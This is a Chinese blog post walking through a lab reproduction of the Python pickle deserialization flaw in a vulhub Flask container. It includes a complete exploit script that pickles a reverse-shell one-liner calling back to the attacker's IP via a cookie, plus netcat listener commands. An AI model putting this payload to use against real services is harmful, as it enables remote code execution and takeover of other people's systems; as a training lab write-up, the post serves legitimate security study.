Python unpickle 命令执行漏洞复现总结

已于 2022-03-29 16:14:44 修改
阅读量5.6k 收藏 4
点赞数
分类专栏: 漏洞 安全 文章标签: 安全
于 2022-03-29 16:14:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44283446/article/details/123815689
版权

Python unpickle 命令执行漏洞复现总结

仅做学习参考使用。

漏洞原理

pickle/cPickle是python序列化存储对象的一个工具,就像php反序列化存在漏洞,python序列化对象被反序列化后也很有可能执行其中的恶意代码,导致任意代码执行。pickle允许任意一个对象去定义一个__reduce__方法来声明怎么去序列化这个对象。这个方法返回一个字符串或者元组来描述当反序列化的时候该如何重构,可以把恶意代码写到__reduce__的返回中就可以构造出恶意的文件。

环境说明

  • 攻击机:kali
  • 靶机:centos

漏洞复现

  1. 搭建vulhub,可以参考我以前的blog:vulhub搭建
  2. 进入vulhub-master/flask/ssti目录
    cd vulhub-master/flask/ssti
  3. 使用docker启动
docker-compose build
docker-compose up -d

执行结果如图所示:
在这里插入图片描述
4. 环境启动完成后,尝试访问
http://#{ip}:8000
在这里插入图片描述
5. 创建exp.py(反弹shell的IP和端口需要根据需要进行修改)

#!/usr/bin/env python3
import requests
import pickle
import os
import base64


class exp(object):
    def __reduce__(self):
        s = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("kali的ip",端口号));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'"""
        return (os.system, (s,))


e = exp()
s = pickle.dumps(e)

response = requests.get("http://#{ip}:8000/", cookies=dict(
    user=base64.b64encode(s).decode()
))
print(response.content)
  1. 在kali开启监听,在靶机上执行.py文件就可以收到反弹的shell。
    开启监听:nc -lvvp 端口号
    执行.py文件:python3 exp.py
  2. 完成后 关闭docker-compose
    docker-compose down

ref:https://blog.csdn.net/zy15667076526/article/details/111824525

yuQnY
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python模块之pickle-序列化与反序列化
chengxy1998的博客
05-26 666
pickle这个模块是实了一个python对象结构的序列化与反序列化。 序列化(pickle):将python的对象及其所有的层次结构转化为一个字节流的过程。 反序列化(unpickle):就是将字节流转化回python对象的层次结构。 在python中,几乎所有的数据类型,如常见的列表(list)、字典(dict)、集合(set)、类(class)等等 都是可以用pickle来进行序列化的。 下面用代码给大家进行部分演示: 进行序列化的方法是dump、进行反序列化的方法是load pickle.dum
python反序列化漏洞 任意代码执行
01-20
上一篇博客中我介绍了python的字符串,元组,列表和字典的序列化 详细请看: python序列化中的字符串,列表,字典,类的序列化解释 这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实任意代码执行 举个例子: import pickle import os class Student(object): name = 'yuaneuro' age = '20' def __reduce__(self):
Python 中 Pickling 和 Unpickling 的区别
最新发布
Saki_Python的博客
09-22 101
在本文中,我们将探讨 Python 中 pickling 和 unpickling 之间的主要区别。我们将详细讨论 Python pickling 和 unpickling 的概念,包括它们的目的、语法、用法以及安全可靠的 pickling 和 unpickling 操作的注意事项。让我们深入了解Python中的 pickling 和 unpickling 的世界。Pickling 是用于序列化对象的 Python 术语,这需要将其转换为可以存储在文件中或通过网络进行通信的二进制表示形式。
python pickle模块:数据序列化和反序列化
jeffery0207的博客
07-27 1135
  pickle模块是python中数据序列化和反序列化的一个包,该模块提供了一套算法,用于对一个Python对象进行serializing(序列化为字符串)和de-serializing(从字符串构建对象),这个过程分别叫做pickle和unpickle。 pickle主要提供了四个功能:dumps,loads,dump,load, 两两配对使用,下面分别说明 : dumps、loads函...
[Python]Unpickle
qq_61209261的博客
08-13 802
python反序列化 __reduce魔法方法
python|浅谈Python中的pickle模块
算法与编程之美
04-26 716
欢迎点击「算法与编程之美」↑关注我们!本文首发于微信公众号:"算法与编程之美",欢迎关注,及时了解更多此系列文章。Pickle模块的作用Pickle模块用于将python...
unsupported operand type(s) for +: ‘range‘ and ‘list‘
qq_42479987的博客
10-30 2066
TypeError: unsupported operand type(s) for +: 'range' and 'list' 在将range和list相加时会出以上错误,只需强制将range转换为list类型即可,如下: columns = range(20) + ["class"]#错误 columns = list(range(20)) + ["class"]#正确 ...
Python标准库中的pickle模块
李世铭的博客
04-03 2329
 pickle  -  Python对象序列化。         pickle模块实了用于序列化和反序列化Python对象结构的二进制协议。“pickle”是将Python对象层次结构转换为一个字节流的过程,而“unpickle”是反向操作,即一个字节流(从二进制文件或字节类对象)转换回对象层次结构。Pickling(和unpickling)也称为“序列化”、“编组”或“扁平化”;然
python pickle反序列化漏洞_浅析python unpickle反序列化漏洞
weixin_39921087的博客
12-08 670
0x01 前言数据序列化常见的应用场景:数据结构网络传输,session存储,cache存储,或者配置文件上传,参数接收等接口处。主要作用:能够让数据在存储或者传输的时候能够单单只用string的类型去表述相对杂的数据结构,方便应用所见即所得,直接进行数据交流处理。引发的安全问题:PHP的unserialize/__wakeup()漏洞、struts的ognl、xml解析的一系列漏洞、Ruby ...
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1019
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
Pickle_Unpickle.rar_Python_
08-09
序列化和反序列化处理,SQL数据库的用法实例代码
sklearn_msgpack:Scikit使用MsgPack学习模型持久性
05-16
UserWarning: Trying to unpickle estimator MLPClassifier from version 0.18 when using version 0.19.1. This might lead to breaking code or invalid results. Use at your own risk. 我们的方法 为了持久化...
stalecucumber:Golang中Python的pickle格式的读写器
05-10
mystring, err := stalecucumber.String(stalecucumber.Unpickle(somePickledData)) 读取一个腌制的整数 pickle.dumps(42) --- var somePickledData io.Reader myint64, err := stalecucumber.Int(stalecucumber.
avazu-spark:在kaggle中引发avazu竞赛的实施
07-23
数据准备涉及5个python脚本:gen_data.py、parallelizer.py、pickle_prediction.py、merge_prediction.py、unpickle_prediction.py ./util/gen_data.py ../tr.rx.csv ../va.rx.csv tr.rx.app.new.csv va.rx.app....
python】28_pickle模块
potizo的博客
05-31 1202
【摘要】本篇博文简析了何为pickle模块,为什么要用pickle模块以及如何使用。 1. pickle模块简介 python的pickle模块实python的所有数据序列和反序列化。与JSON不同的是pickle不是用于多种语言间的数据传输,它仅作为python对象的持久化或者python程序间进行互相传输对象的方法,因此它支持了python所有的数据类型。 在讲JSON模块的时候,我们就讲...
【深度学习初探】Day11 - Cirfa10数据集
oo00Z00oo的博客
04-17 517
Cifar-10数据集是一个比较出名的数据集。它一共有10类图片,每一类有6000张图片,加起来就是60000张图片,每张图片的尺寸是32x32,图片是彩色图。今天我们来了解一下这个数据集,然后对其进行可视化操作。
Python unpickle 造成任意命令执行漏洞
EC_Carrot的博客
07-22 520
漏洞 漏洞详细请看:https://vulhub.org/#/environments/python/unpickle/ 我们直接利用vulhub自带的exp.py来,设置好参数后,运行脚本,可以反弹shell 脚本内容: #!/usr/bin/env python3 import requests import pickle import os import base64 class exp(object): def __reduce__(self): s = """p
python pickle反序列化漏洞_渗透测试 - 黑客技术 | 【技术分享】记CTF比赛中发Python反序列化漏洞_吾爱漏洞...
weixin_39618121的博客
12-12 612
写在前面的话在前几天,我有幸参加了ToorConCTF(https://twitter.com/toorconctf),而在参加此次盛会的过程中我第一次在Python中发了序列化漏洞。在我们的比赛过程中,有两个挑战中涉及到了能够接受序列化对象的Python库,而我们通过研究发,这些Python库中存在的安全漏洞将有可能导致远程代码执行(RCE)。由于我发网上关于这方面的参考资料非常散乱,查找...
cs231n:python3.6.4对实验数据图像的读取,课后作业代码解释
a781751136的博客
03-28 1462
作者:AlwaysOnline时间:2018年3月。 声明:版权所有,转载请注明出处,谢谢!!!地址:https://blog.csdn.net/a781751136/article/details/79725922仅供参考,错误欢迎指正!!!1.相信大家都已经在其他地方找到了cs231n的翻译课程,邻近算法原理和KNN自己看其他人博客,我就直接进入正题,解决操作上遇到的问题!!!2.数据的下载h...
unpickle函数
07-28
unpickle函数是一个Python函数,用于从文件中反序列化(或解析)Python对象。它通常与pickle函数一起使用,pickle函数用于将Python对象序列化为二进制数据并保存到文件中,而unpickle函数则用于从文件中读取并恢这些对象。 以下是一个使用unpickle函数的示例: ```python import pickle def unpickle(file_path): with open(file_path, 'rb') as file: obj = pickle.load(file) return obj # 从文件中加载已序列化的对象 data = unpickle('data.pkl') # 对恢的对象进行操作 print(data) ``` 在上面的示例中,unpickle函数接受一个文件路径作为参数,并使用pickle.load函数从该文件中加载已序列化的对象。然后,该函数返回恢的对象,你可以对其进行进一步的操作。 请注意,unpickle函数仅适用于从由pickle函数创建的文件中加载已序列化的对象。如果文件不是使用pickle序列化的,则可能会导致错误。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值